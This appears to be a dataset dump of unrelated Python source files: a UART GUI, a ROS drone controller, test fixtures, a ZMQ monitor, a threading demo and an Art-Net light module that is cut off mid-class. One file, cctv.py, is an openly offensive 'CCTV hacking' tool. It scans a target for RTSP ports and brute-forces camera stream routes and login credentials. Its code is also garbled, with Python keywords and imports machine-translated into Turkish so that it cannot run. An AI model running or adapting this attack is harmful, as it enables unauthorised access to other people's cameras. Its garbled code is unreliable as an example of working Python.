source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
oai_kpa_interface_backend.py
|
from PyQt5 import QtGui
from PyQt5.QtWidgets import QWidget, QTableWidgetItem
import threading
import time
import json
import os.path
from . import oai_kpa_interface_gui
from . import utils
from . import oai_kpa_interface
class OAI_KPA_Interface_controller(QWidget, oai_kpa_interface_gui.Ui_Form):
def __init__(self):
# ------------------- window init ------------------------ #
super().__init__()
self.setupUi(self)
self.setMinimumHeight(485)
self.setWindowTitle('OAI KPA Interface')
# ======================================================== #
# ------------------ custom signals -------------------- #
self.update_table_signal_obj = utils.UpdateTableSignal()
self.update_table_signal_obj.update_table_signal.connect(self.update_table)
# ======================================================== #
# ------------------ connect signals -------------------- #
self.uart_connect_button.pressed.connect(self.connect_device)
self.uart_serial_num_refresh_button.pressed.connect(self.refresh_serial_num_list)
self.uart_serial_num_combobox.currentIndexChanged.connect(self.update_serial_num_in_line_edit)
self.send_in_uart_button.pressed.connect(self.uart_transmit)
self.reload_file_button.pressed.connect(self.reload_log_file)
self.clear_browser_button.pressed.connect(self.clear_log_browser)
self.print_in_browser_checkbox.pressed.connect(self.log_browser_change_condition)
self.print_in_file_checkbox.pressed.connect(self.log_file_change_condition)
# ====================================================== #
self.interface = oai_kpa_interface.OaiDigitalModule(serial_num=['20703699424D'], debug=True)
self.single_window = True
self.read_continuously_flag = False
self.config_file_name = "config.json"
self.command_file_name = "commands.json"
self.ai_read_thread = None
# ------------------ uart variables -------------------- #
self.ai_list = []
self.uart_last_parcel = []
self.rx_struct = {}
self.last_write_ptr = 0
if self.uart_ch_combobox.currentText() == 'UART 1':
self.uart = self.interface.uart1
else:
self.uart = self.interface.uart2
# ====================================================== #
if not self.search_command_file():
print("command file does not exist")
command_obj = utils.Commands()
command_obj.cmd = [['start', '0, 1, 2, 3'], ['stop', '2, 3, 4, 5']]
utils.create_json_file(command_obj, self.command_file_name)
else:
with open(self.command_file_name, "r") as read_file:
command_obj = utils.Commands()
command_obj.__dict__ = json.load(read_file)
print(command_obj.cmd)
if len(command_obj.cmd) == 0:
self.scroll_area.close()
else:
for i in command_obj.cmd:
btn = utils.DynamicButton(i[0], self, cmd=i[1])
btn.left_click.connect(self.dynamic_button_pressed)
self.vbox.addWidget(btn)
self.scroll_area.setLayout(self.vbox)
if not self.search_config_file():
print("config file does not exist")
config_obj = utils.Config(channel=0, baudrate=1, parity=0, stop_bit=0, serial_num=5)
utils.create_json_file(config_obj, self.config_file_name)
else:
print("config file exists")
try:
with open(self.config_file_name, "r") as read_file:
config_obj = utils.Config()
config_obj.__dict__ = json.load(read_file)
self.uart_ch_combobox.setCurrentIndex(config_obj.uart_channel)
self.uart_baudrate_combobox.setCurrentIndex(config_obj.uart_baudrate)
self.uart_parity_combobox.setCurrentIndex(config_obj.uart_parity)
self.uart_stop_bit_combobox.setCurrentIndex(config_obj.uart_stop_bit)
self.uart_serial_num_line_edit.setText(config_obj.serial_num)
except Exception as error:
print(error)
if not self.single_window:
self.widget_3.close()
def search_config_file(self):
return os.path.isfile(self.config_file_name) and os.stat(self.config_file_name).st_size != 0
def search_command_file(self):
return os.path.isfile(self.command_file_name) and os.stat(self.command_file_name).st_size != 0
def connect_device(self):
try:
if self.uart_connect_button.text() == "Connect":
config_obj = utils.Config(channel=0, baudrate=1, parity=0, stop_bit=0, serial_num=5)
config_obj.uart_channel = self.uart_ch_combobox.currentIndex()
config_obj.uart_baudrate = self.uart_baudrate_combobox.currentIndex()
config_obj.uart_parity = self.uart_parity_combobox.currentIndex()
config_obj.uart_stop_bit = self.uart_stop_bit_combobox.currentIndex()
config_obj.serial_num = self.uart_serial_num_line_edit.text()
with open(self.config_file_name, 'w') as file:
file.write(config_obj.to_json())
if self.interface.connect() == 1:
self.uart_connect_button.setText("Disconnect")
self.read_continuously_flag = True
self.ai_read_thread = threading.Thread(name='ai_read', target=self.__read_routine, daemon=True)
self.ai_read_thread.start()
if not self.ai_read_thread.is_alive():
self.read_continuously_flag = False
print("some error with thread")
else:
self.uart_connect_button.setText("Error connection")
else:
self.uart_connect_button.setText("Connect")
self.read_continuously_flag = False
self.interface.disconnect()
self.update_table()
except Exception as error:
print("oai_kpa_interface error in func connect_device")
print(error)
def refresh_serial_num_list(self):
self.uart_serial_num_combobox.clear()
devices = self.interface.client.get_connected_devices()
for i in devices:
if i[1] != '':
self.uart_serial_num_combobox.addItem(i[1])
def update_serial_num_in_line_edit(self):
self.uart_serial_num_line_edit.setText(self.uart_serial_num_combobox.currentText())
def uart_transmit(self):
if self.send_in_uart_line_edit.text() != "":
input_array = self.send_in_uart_line_edit.text().replace(',', ' ').replace(';', ' ').split(' ')
uart_send_byte_array = [int(byte) for byte in input_array]
print("uart tx: ", uart_send_byte_array)
self.interface.uart_send(data_bytes=uart_send_byte_array, uart=self.uart)
self.log_browser.append("tx[" + str(self.uart.tx_packet_counter) + "] -> " + self.send_in_uart_line_edit.text())
self.uart.tx_packet_counter += 1
def reload_log_file(self):
pass
def clear_log_browser(self):
self.log_browser.clear()
def log_browser_change_condition(self):
pass
def log_file_change_condition(self):
pass
def update_table(self):
try:
# self.ai_list = [0, 1, 2, 3, 4, 5, 6, 7]
# print(self.ai_list)
counter = 0
for i in self.ai_list:
if self.interface.client.connection_status:
self.analog_inputs_table.setItem(0, counter, QTableWidgetItem(str(i)))
if i > 3100:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(255, 0, 0))
elif 1100 < i <= 3100:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(255, 196, 0))
else:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(0, 255, 0))
counter += 1
else:
self.analog_inputs_table.item(counter, 0).setBackground(QtGui.QColor(255, 255, 255))
counter += 1
except Exception as error:
print(error)
def __read_routine(self):
self.rx_struct = self.interface.uart_get_rx_struct(self.uart)
self.last_write_ptr = self.rx_struct.get('write_ptr')
while self.read_continuously_flag:
try:
self.ai_list = self.interface.get_analog_inputs()
self.rx_struct = self.interface.uart_get_rx_struct(self.uart)
if self.last_write_ptr != self.rx_struct.get('write_ptr'):
print("last write_ptr before = ", self.last_write_ptr)
self.log_browser.append('rx[' + str(self.uart.rx_packet_counter) + '] <- ' +
str(self.rx_struct.get('data')))
self.last_write_ptr = self.rx_struct.get('write_ptr')
print("last write_ptr after = ", self.last_write_ptr)
self.uart.rx_packet_counter += 1
self.update_table_signal_obj.update_table_signal.emit()
time.sleep(0.2)
except Exception as error:
print(error)
def dynamic_button_pressed(self):
print(self.sender().cmd)
self.log_browser.append("tx[" + str(self.uart.tx_packet_counter) + "] -> " + self.sender().cmd)
self.uart.tx_packet_counter += 1
|
drone_sample_controller_pictures.py
|
#!/usr/bin/env python
import ConfigParser #to parse config file with drone and employer's addresses and keys
import cv2 #for image converting
import ipfshttpclient #to send data to IPFS
import os #to locate files
import rospy #Python client library for ROS
import subprocess #to call shell commands from terminal and use robonomics binary
import threading #threading to publish topics
import time #to sleep
from cv_bridge import CvBridge, CvBridgeError
from geometry_msgs.msg import Twist #message type for /cmd_vel
from sensor_msgs.msg import Image #message type for /drone/front_camera/image_raw
from std_msgs.msg import Empty #message type for /drone/takeoff and /drone/land
def takeoff():
rospy.loginfo("Taking Off")
takeoff = rospy.Publisher('drone/takeoff', Empty, queue_size=10)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
takeoff.publish()
if stop_takingoff:
break
rate.sleep()
def land():
rospy.loginfo("Landing")
land = rospy.Publisher('drone/land', Empty, queue_size=10)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
land.publish()
if stop_landing:
break
rate.sleep()
def fly():
rospy.loginfo("Flying")
move = rospy.Publisher('cmd_vel', Twist, queue_size=10)
circle_command = Twist()
circle_command.linear.x = 1.0
circle_command.linear.y = 0.0
circle_command.linear.z = 0.0
circle_command.angular.x = 0.0
circle_command.angular.y = 0.0
circle_command.angular.z = 0.4
rate = rospy.Rate(10)
while not rospy.is_shutdown():
move.publish(circle_command)
if stop_flying:
circle_command.linear.x = 0.0
circle_command.angular.z = 0.0
move.publish(circle_command)
break
rate.sleep()
def take_pictures():
rate = rospy.Rate(2)
while not rospy.is_shutdown():
if stop_taking_pictures:
break
rospy.Subscriber("/drone/front_camera/image_raw", Image, image_callback)
rate.sleep()
def image_callback(msg):
global i
global dirname
if (i - time.time() < -1):
i = time.time()
try:
cv2_img = bridge.imgmsg_to_cv2(msg, "bgr8")
cv2.imwrite(dirname + 'src/drone_images/front_camera_image' + str(time.time()) + '.jpeg', cv2_img)
rospy.loginfo("Image saved!")
except CvBridgeError, e:
print(e)
rospy.init_node('drone_controller', anonymous = False)
rospy.loginfo('Node initialized')
global i
global dirname
i = time.time()
bridge = CvBridge()
#waiting for transaction
rospy.loginfo("Parsing Config")
dirname = os.path.dirname(__file__) + '/../'
configParser = ConfigParser.RawConfigParser()
configFilePath = dirname + 'src/config.config'
configParser.read(configFilePath)
rospy.loginfo("Parsing Completed")
rospy.loginfo("Creating directory for pictures")
os.mkdir(dirname + 'src/drone_images')
rospy.loginfo("Waiting for flight payment")
program = configParser.get('key_and_addresses', 'ROBONOMICS_DIR') + "/robonomics io read launch" #that's the bash command to launch Robonomics IO and read the transactions
process = subprocess.Popen(program, shell=True, stdout=subprocess.PIPE)
while True:
try:
output = process.stdout.readline()
if output.strip() == configParser.get('key_and_addresses', 'EMPLOYER_ADDRESS') + " >> " + configParser.get('key_and_addresses', 'DRONE_ADDRESS') + " : true": #checking the correct payment to the drone address
rospy.loginfo("Flight Paid!")
process.kill()
break #after that the script will continue running
if output.strip():
rospy.loginfo("Not my flight is paid!")
except KeyboardInterrupt:
process.kill()
exit
takingoff = threading.Thread(target=takeoff)
flying = threading.Thread(target=fly)
landing = threading.Thread(target=land)
taking_pictures = threading.Thread(target=take_pictures)
stop_takingoff = False
stop_flying = False
stop_landing = False
stop_taking_pictures = False #flages used to stop threads
taking_pictures.start()
rospy.loginfo("Started taking pictures")
takingoff.start()
time.sleep(1)
stop_takingoff = True
takingoff.join()
flying.start()
time.sleep(10)
stop_flying = True
flying.join()
landing.start()
time.sleep(1)
stop_landing = True
landing.join()
stop_taking_pictures = True
taking_pictures.join()
rospy.loginfo("Pushing files to IPFS")
try:
client = ipfshttpclient.connect()
res = client.add(dirname + 'src/drone_images', recursive=True)
except Exception, e:
print(e)
rospy.loginfo ("Files pushed. IPFS hash is " + res[-1].values()[0].encode('utf8'))
rospy.loginfo("Removing directory")
try:
piclist = [f for f in os.listdir(dirname + 'src/drone_images')]
for f in piclist:
os.remove(os.path.join(dirname + 'src/drone_images', f))
os.rmdir(dirname + 'src/drone_images')
except Exception, e:
print(e)
rospy.loginfo ("Publishing IPFS hash to chain")
try:
program = "echo \"" + res[-1].values()[0].encode('utf8') + "\" | " + configParser.get('key_and_addresses', 'ROBONOMICS_DIR') + "/robonomics io write datalog -s " + configParser.get('key_and_addresses', 'DRONE_KEY')
process = subprocess.Popen(program, shell=True, stdout=subprocess.PIPE)
output = process.stdout.readline()
rospy.loginfo("Published data to chain. Transaction hash is " + output.strip())
except Exception, e:
print(e)
rospy.loginfo("Job done. Check DAPP for IPFS data hash")
|
test_http.py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import queue
import pretend
import warehouse.http
_REQUEST = pretend.stub(
log=pretend.stub(
debug=pretend.call_recorder(lambda *args: None),
)
)
class TestSession:
def test_create(self):
config = {
"verify": "foo",
}
factory = warehouse.http.ThreadLocalSessionFactory(config)
session_a, session_b = factory(_REQUEST), factory(_REQUEST)
assert session_a is session_b
assert session_a.verify == session_b.verify == config["verify"]
def test_threads(self):
def _test_factory(fifo, start):
start.wait()
factory = warehouse.http.ThreadLocalSessionFactory()
# the actual session instance is stuck into the queue here as to
# maintain a reference so it's not gc'd (which can result in id
# reuse)
fifo.put(
(threading.get_ident(), factory(_REQUEST))
)
start = threading.Event()
fifo = queue.Queue()
threads = [
threading.Thread(target=_test_factory, args=(fifo, start))
for _ in range(10)
]
for thread in threads:
thread.start()
start.set()
for thread in threads:
thread.join()
# data pushed into the queue is (threadid, session).
# this basically proves that the session object id is different per
# thread
results = [fifo.get() for _ in range(len(threads))]
idents, objects = zip(*results)
assert len(set(idents)) == len(threads)
assert len(set(id(obj) for obj in objects)) == len(threads)
def test_includeme():
config = pretend.stub(
registry=pretend.stub(
settings={},
),
add_request_method=pretend.call_recorder(
lambda *args, **kwargs: None
),
)
warehouse.http.includeme(config)
assert len(config.add_request_method.calls) == 1
call = config.add_request_method.calls[0]
assert isinstance(call.args[0], warehouse.http.ThreadLocalSessionFactory)
assert call.kwargs == {"name": "http", "reify": True}
|
start_and__monitor.py
|
'''
Copyright 2019-present Open Networking Foundation
SPDX-License-Identifier: Apache-2.0
'''
import zmq
import time
import threading
import sys
import signal
import os
old_stats = {"in_router" : {}, "out_router" : {}}
new_stats = {"in_router" : {}, "out_router" : {}}
def createDir(dir):
try:
if not os.path.exists(dir):
os.makedirs(dir)
except OSError:
print ('Error: Creating directory. ' + dir)
def monitor_router(name):
global new_stats
path = 'ipc://ipc/monitor/'+name
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect(path)
socket.setsockopt(zmq.SUBSCRIBE, '')
while True:
try:
message = socket.recv_json()
new_stats[name] = message[name]
except:
print "Thread will exit now..."
socket.close()
break
createDir('./ipc/monitor')
createDir('./ipc/slaves/push')
t1 = threading.Thread(target=monitor_router,args=("in_router",))
t2 = threading.Thread(target=monitor_router,args=("out_router",))
t1.start()
t2.start()
os.system("clear")
try:
while True:
#print in_string
#print out_string
#print new_stats
#print old_stats
print "**************** Ingress Statistics *******************\n"
print "DP IP | Total Messages | Msgs/Sec"
for dp_ip, [queue_name, curr_ctr] in new_stats['in_router'].iteritems():
if not dp_ip in old_stats['in_router']:
old_stats['in_router'][dp_ip] = 0
print dp_ip," | ",curr_ctr," | ",(curr_ctr-old_stats["in_router"][dp_ip])/5
old_stats["in_router"][dp_ip]= curr_ctr
print "\n\n\n**************** Egress Statistics *******************\n"
print "CTF IP | DP IP | Total Messages | Msgs/Sec"
for ident, [queue_name, curr_ctr] in new_stats["out_router"].iteritems():
if not ident in old_stats["out_router"]:
old_stats["out_router"][ident] = 0
print ident," | ",queue_name," | ",curr_ctr," | ",(curr_ctr-old_stats["out_router"][ident])/5
old_stats["out_router"][ident]= curr_ctr
time.sleep(5)
os.system("clear")
except:
print "Exception: Main thread will exit now"
os.kill(os.getpid(), signal.SIGKILL)
|
cctv.py
|
import sys, time, argparse, re, threading
import pyfiglet #pip'i içe aktar
import iş parçacığından içe aktarma Kilidi
from colorama import init
termcolor ithal renkli
lib'lerden masscanscanner'ı masscan olarak içe aktarın
libs ithalat satıcısından
lib'lerden saldırı rotalarını içe aktar
lib'lerden saldırı kimlik bilgilerini içe aktar
init() # Colors
s_print_lock = Lock() # cctv güvenli yazdırma
ascii_banner = pyfiglet.figlet_format("cctv")
print("{}\n{}\n\n".format(ascii_banner, "CCTV hacking"))
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", required=True, help="CCTV tek bir IP adresinde hedefleyin.")
args = parser.parse_args()
cidrregex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(3[0-2]|[1-2][0-9]|[0-9]))$"
ipv4regex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
if re.match(cidrregex, args.target) == None and re.match(ipv4regex, args.target) == None:
print(colored("[ERR]Gecersiz CCTV Hedefi Belirtildi.", "red"))
sys.exit(0)
print(colored("[INFO] RTSP Bağlantı Noktaları Taranıyor...", "cyan"))
scanResults = masscan.detect(args.target)
if scanResults == None:
print(colored("[!] Hedef Bulunamadı.", "red"))
sys.exit(0)
print(colored("[INFO] Port Taraması Tamamlandı.Saldırı Başlatılıyor...", "cyan"))
# Thread-safe print
def s_print(*a, **b):
with s_print_lock:
print(*a, **b)
def attack(target, port):
authMethod = dealer.decide(target, port) # Geçerli hedefin kimlik doğrulama yöntemini alın
if authMethod == None: # Hedef muhtemelen bilinen bir rota gerektiriyor
s_print(colored("[INFO] {} at port {} Geçerli bir rota gerektirir.Bulmaya çalışıyorum...".format(target, port), "cyan"))
routesFirst = attackroutes.start(target, port, authMethod)
if routesFirst is not None and len(routesFirst) > 0: # If routes found
s_print(colored("[INFO] We got valid route(s) for {}:{}! Saldırıyor...".format(target, port), "yellow"))
# Halihazırda bulunan rotalarla kimlik bilgileri saldırısını başlatın.
credsAfter = attackcredentials.start(target, port, authMethod, routesFirst)
if credsAfter is not None and len(credsAfter) > 0:
for cred in credsAfter:
s_print(colored("[SUCCESS] Bulunan: {}".format(cred), "green"))
else:
s_print(colored("[FAIL] Kimlik bilgisi bulunamadı {}:{}".format(target, port), "red"))
else:
s_print(colored("[FAIL] Adreste geçerli bir rota bulunamadı: {}:{}".format(target, port), "red"))
else: # Özet veya Temel kimlik doğrulama
s_print(colored("[INFO] {} at port {} Özet veya Temel kimlik doğrulama".format(target, port), "cyan"))
credsFirst = attackcredentials.start(target, port, authMethod)
if credsFirst is not None and len(credsFirst) > 0: # Kimlik bilgileri bulunursa
s_print(colored("[INFO] Şunun için geçerli kimlik bilgilerine sahibiz: {}:{}!Şimdi rotalar bulunuyor.".format(target, port), "yellow"))
for user in credsFirst[target][port]:
# Geçerli kimlik bilgileriyle rota saldırısını başlatın
routesAfter = attackroutes.start(target, port, authMethod, user, credsFirst[target][port][user])
if routesAfter is not None and len(routesAfter) > 0:
for stream in routesAfter:
s_print(colored("[SUCCESS] Bulunan: {}".format(stream), "green"))
else:
s_print(colored("[FAIL] Geçerli cctv bulunamadı {}:{}".format(target, port), "red"))
else:
s_print(colored("[FAIL] Kimlik bilgisi bulunamadı {}:{}".format(target, port), "red"))
for target in scanResults:
for port in scanResults[target]["tcp"]:
if scanResults[target]["tcp"][port]["state"] != "open":
continue # Kapalı portları atla (sanity check - no need)
thread = threading.Thread(target = attack, args = (target, port))
thread.start()
if threading.active_count() == 100:
thread.join()
|
conftest.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
from functools import partial, wraps
from http.server import SimpleHTTPRequestHandler
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
if pyfuncitem.get_closest_marker("spawn"):
testfunction = pyfuncitem.obj
funcargs = pyfuncitem.funcargs
testargs = tuple([funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames])
mp.spawn(wraps, (testfunction, testargs))
return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
|
day27-4 线程之间执行是无序的.py
|
# 结论:线程之间执行是无序的,具体调用哪个线程是由CPU决定的
import threading
import time
def task():
time.sleep(1)
# 获取当前线程
print(threading.current_thread())
if __name__ == '__main__':
# 循环创建大量线程
for i in range(10):
# 每循环一次创建一个子线程
sub_thread = threading.Thread(target=task)
# 启动子线程对应任务
sub_thread.start()
|
artnet.py
|
"""
Home Assistant support for Art-Net/DMX lights over IP
Date: 2018-08-14
Homepage: https://github.com/jnimmo/hass-artnet
Author: James Nimmo
"""
import asyncio
import logging
import socket
from struct import pack
from threading import Thread
import time
from homeassistant.const import (CONF_DEVICES, CONF_HOST, CONF_NAME, CONF_PORT, CONF_TYPE)
from homeassistant.components.light import (ATTR_BRIGHTNESS, ATTR_ENTITY_ID, ATTR_HS_COLOR,
ATTR_TRANSITION, ATTR_WHITE_VALUE, Light,
PLATFORM_SCHEMA, SUPPORT_BRIGHTNESS,
SUPPORT_COLOR, SUPPORT_WHITE_VALUE,
SUPPORT_TRANSITION)
from homeassistant.util.color import color_rgb_to_rgbw
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
import voluptuous as vol
_LOGGER = logging.getLogger(__name__)
DATA_ARTNET = 'light_artnet'
CONF_CHANNEL = 'channel'
CONF_DMX_CHANNELS = 'dmx_channels'
CONF_DEFAULT_COLOR = 'default_rgb'
CONF_DEFAULT_LEVEL = 'default_level'
CONF_SEND_LEVELS_ON_STARTUP = 'send_levels_on_startup'
CONF_TRANSITION = ATTR_TRANSITION
# Light types
CONF_LIGHT_TYPE_DIMMER = 'dimmer'
CONF_LIGHT_TYPE_RGB = 'rgb'
CONF_LIGHT_TYPE_RGBW = 'rgbw'
CONF_LIGHT_TYPE_RGBW_AUTO = 'rgbw_auto'
CONF_LIGHT_TYPE_SWITCH = 'switch'
CONF_LIGHT_TYPES = [CONF_LIGHT_TYPE_DIMMER, CONF_LIGHT_TYPE_RGB, CONF_LIGHT_TYPE_RGBW_AUTO,
CONF_LIGHT_TYPE_SWITCH, CONF_LIGHT_TYPE_RGBW]
# Number of channels used by each light type
CHANNEL_COUNT_MAP, FEATURE_MAP, COLOR_MAP = {}, {}, {}
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_DIMMER] = 1
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_RGB] = 3
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_RGBW] = 4
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_RGBW_AUTO] = 4
CHANNEL_COUNT_MAP[CONF_LIGHT_TYPE_SWITCH] = 1
# Features supported by light types
FEATURE_MAP[CONF_LIGHT_TYPE_DIMMER] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION)
FEATURE_MAP[CONF_LIGHT_TYPE_RGB] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION | SUPPORT_COLOR)
FEATURE_MAP[CONF_LIGHT_TYPE_RGBW] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION | SUPPORT_COLOR | SUPPORT_WHITE_VALUE)
FEATURE_MAP[CONF_LIGHT_TYPE_RGBW_AUTO] = (SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION | SUPPORT_COLOR)
FEATURE_MAP[CONF_LIGHT_TYPE_SWITCH] = ()
# Default color for each light type if not specified in configuration
COLOR_MAP[CONF_LIGHT_TYPE_DIMMER] = None
COLOR_MAP[CONF_LIGHT_TYPE_RGB] = [255, 255, 255]
COLOR_MAP[CONF_LIGHT_TYPE_RGBW] = [255, 255, 255]
COLOR_MAP[CONF_LIGHT_TYPE_RGBW_AUTO] = [255, 255, 255]
COLOR_MAP[CONF_LIGHT_TYPE_SWITCH] = None
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_DMX_CHANNELS, default=512): vol.All(vol.Coerce(int), vol.Range(min=1, max=512)),
vol.Required(CONF_DEFAULT_LEVEL, default=0): cv.byte,
vol.Required(CONF_DEVICES): vol.All(cv.ensure_list, [
{
vol.Required(CONF_CHANNEL): vol.All(vol.Coerce(int), vol.Range(min=1, max=512)),
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_TYPE): vol.In(CONF_LIGHT_TYPES),
vol.Optional(CONF_DEFAULT_LEVEL): cv.byte,
vol.Optional(ATTR_WHITE_VALUE): cv.byte,
vol.Optional(CONF_DEFAULT_COLOR): vol.All(
vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.Optional(CONF_TRANSITION, default=0): vol.All(vol.Coerce(int), vol.Range(min=0, max=60)),
}
]),
vol.Optional(CONF_PORT, default=6454): cv.port,
vol.Optional(CONF_SEND_LEVELS_ON_STARTUP, default=True): cv.boolean,
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
send_levels_on_startup = config.get(CONF_SEND_LEVELS_ON_STARTUP)
# Send the specified default level to pre-fill the channels with
overall_default_level = config.get(CONF_DEFAULT_LEVEL)
dmx = None
if not dmx:
dmx = DMXGateway(host, port, overall_default_level, config[CONF_DMX_CHANNELS])
lights = (ArtnetLight(light, dmx, send_levels_on_startup) for light in config[CONF_DEVICES])
async_add_devices(lights)
return True
class ArtnetLight(Light):
"""Representation of an Artnet Light."""
def __init__(self, light, controller, send_immediately):
"""Initialize an artnet Light."""
self._controller = controller
# Fixture configuration
self._channel = light.get(CONF_CHANNEL)
self._name = light.get(CONF_NAME)
self._type = light.get(CONF_TYPE, CONF_LIGHT_TYPE_DIMMER)
self._fade_time = light.get(CONF_TRANSITION)
self._brightness = light.get(CONF_DEFAULT_LEVEL, controller.default_level)
self._rgb = light.get(CONF_DEFAULT_COLOR, COLOR_MAP.get(self._type))
self._white_value = light.get(ATTR_WHITE_VALUE, 0)
# Apply maps and calculations
self._channel_count = CHANNEL_COUNT_MAP.get(self._type, 1)
self._channels = [channel for channel in range(self._channel, self._channel + self._channel_count)]
self._features = FEATURE_MAP.get(self._type)
# Brightness needs to be set to the maximum default RGB level, then scale up the RGB values to what HA uses
if self._rgb:
self._brightness = max(self._rgb)
self._rgb = scale_rgb_to_brightness(self._rgb, self._brightness)
logging.debug("Setting default values for '%s' to %s", self._name, repr(self.dmx_values))
# Send default levels to the controller
self._controller.set_channels(self._channels, self.dmx_values, send_immediately)
self._state = self._brightness >= 0 or self._white_value >= 0
@property
def name(self):
"""Return the display name of this light."""
return self._name
@property
def brightness(self):
"""Return the brightness of the light."""
return self._brightness
@property
def device_state_attributes(self):
data = {}
data['dmx_channels'] = self._channels
data[CONF_TRANSITION] = self._fade_time
data['dmx_values'] = self.dmx_values
return data
@property
def is_on(self):
"""Return true if light is on."""
return self._state
@property
def hs_color(self):
"""Return the HS color value."""
if self._rgb:
return color_util.color_RGB_to_hs(*self._rgb)
else:
return None
@property
def white_value(self):
"""Return the white value of this light between 0..255."""
if self._type == CONF_LIGHT_TYPE_RGBW:
return self._white_value
else:
return None
@property
def dmx_values(self):
# Select which values to send over DMX
if self._type == CONF_LIGHT_TYPE_RGB:
# Scale the RGB colour value to the selected brightness
return scale_rgb_to_brightness(self._rgb, self._brightness)
elif self._type == CONF_LIGHT_TYPE_RGBW:
rgbw = scale_rgb_to_brightness(self._rgb, self._brightness)
rgbw.append(round(self._white_value * (self._brightness / 255)))
return rgbw
elif self._type == CONF_LIGHT_TYPE_RGBW_AUTO:
# Split the white component out from the scaled RGB values
scaled_rgb = scale_rgb_to_brightness(self._rgb, self._brightness)
return color_rgb_to_rgbw(*scaled_rgb)
else:
return self._brightness
@property
def supported_features(self):
"""Flag supported features."""
return self._features
@property
def should_poll(self):
return False
@property
def fade_time(self):
return self._fade_time
@fade_time.setter
def fade_time(self, value):
self._fade_time = value
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Instruct the light to turn on.
Move to using one method on the DMX class to set/fade either a single channel or group of channels
"""
self._state = True
transition = kwargs.get(ATTR_TRANSITION, self._fade_time)
# Update state from service call
if ATTR_BRIGHTNESS in kwargs:
self._brightness = kwargs[ATTR_BRIGHTNESS]
if ATTR_HS_COLOR in kwargs:
self._rgb = color_util.color_hs_to_RGB(*kwargs[ATTR_HS_COLOR])
# self._white_value = color_rgb_to_rgbw(*self._rgb)[3]
if ATTR_WHITE_VALUE in kwargs:
self._white_value = kwargs[ATTR_WHITE_VALUE]
logging.debug("Setting light '%s' to values %s with transition time %i", self._name, repr(self.dmx_values),
transition)
asyncio.ensure_future(
self._controller.set_channels_async(self._channels, self.dmx_values, transition=transition))
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_turn_off(self, **kwargs):
"""Instruct the light to turn off. If a transition time has been specified in seconds
the controller will fade."""
transition = kwargs.get(ATTR_TRANSITION, self._fade_time)
logging.debug("Turning off '%s' with transition %i", self._name, transition)
asyncio.ensure_future(self._controller.set_channels_async(self._channels, 0, transition=transition))
self._state = False
self.async_schedule_update_ha_state()
def update(self):
"""Fetch update state."""
# Nothing to return
class DMXGateway(object):
"""
Class to keep track of the values of DMX channels and provide utilities to
send values to the DMX gateway.
"""
def __init__(self, host, port, default_level, number_of_channels):
"""
Initialise a bank of channels, with a default value specified by the caller.
"""
